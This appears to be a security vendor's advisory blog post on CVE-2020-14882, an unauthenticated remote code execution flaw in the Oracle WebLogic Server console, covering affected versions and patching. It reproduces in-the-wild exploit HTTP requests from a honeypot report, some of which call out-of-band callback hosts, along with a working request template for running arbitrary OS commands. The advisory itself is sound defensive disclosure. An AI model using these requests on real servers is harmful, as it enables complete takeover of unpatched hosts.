Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882)

Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882)

Critical Remote Code Execution (RCE) vulnerability CVE-2020-14882 in the console component of the WebLogic Server allows unauthenticated, remote attackers to execute commands on the affected servers. Oracle has assigned its CVSSv3 score of 9.8 out of 10 which clearly shows this vulnerability’s criticality and should be patched ASAP. Johannes B. Ullrich, dean of research at the SANS Technology Institute, said in the post that vulnerable Oracle WebLogic Servers that are not patched till now then Assume it has been compromised.

Exploits are seemed to be originated from a blog post published (in Vietnamese) by “Jang”. In his blog, he described how the flaw can be exploited to achieve remote code execution with only a single HTTP request.


Vulnerability Details

The RCE vulnerability exists in the console component of the WebLogic Server. The vulnerability can be exploited by sending a crafted HTTP request and can lead to complete control of the host. A security researcher, Jang in his blog post included partial details of the flaw which can be used for a PoC.

As discussed in SANS ISC Post, the below exploits are currently used (the honeypot’s IP has been replaced with AAA.BBB.CCC.DDD)

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c

GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \”java.lang.Runtime.getRuntime().exec( ‘nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net’)

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String(\”test\”)

This pre-authentication is given an attack complexity of “low” and highlighted as “easily exploitable” by Oracle. Due to the “low” complexity of the exploit, attackers requires no user interaction and no privileges to exploit the vulnerability.

A typical crafted HTTP request which exploits the vulnerability and execute “calc.exe” is given below:

http://<domain>/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runtime.getRuntime().exec(“calc.exe“);”);

In the above request, “calc.exe” can be replaced by any other OS command.

Successful exploitation of the vulnerability “calc.exe” executed on the affected host as shown in the below picture.

Publicly available PoC

The proof-of-concept codes are publicly available for the vulnerability.

  • Exploit PoC on Twitter.
  • Exploit PoC on Github.

Impact

This vulnerability allows an unauthenticated, remote attacker to execute commands and can be used to achieve complete control of the affected host.


Affected Oracle WebLogic Versions

  • 14.1.1.0.0
  • 12.2.1.4.0
  • 12.2.1.3.0
  • 12.1.3.0.0
  • 10.3.6.0.0

Solution

SanerNow security content has been published to detect this vulnerability. Oracle has already released a security update this month and these patches are available only for Oracle customers. Please be advised to download the patch from the Oracle portal and install it. SanerNow software deployment capability can be used to install executable/scripts.

Subscribe For More Posts Like This

Get the latest research, best practices, industry trends and cybersecurity blogs from SecPod security experts

Invalid email address
We promise not to spam you. You can unsubscribe at any time.
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments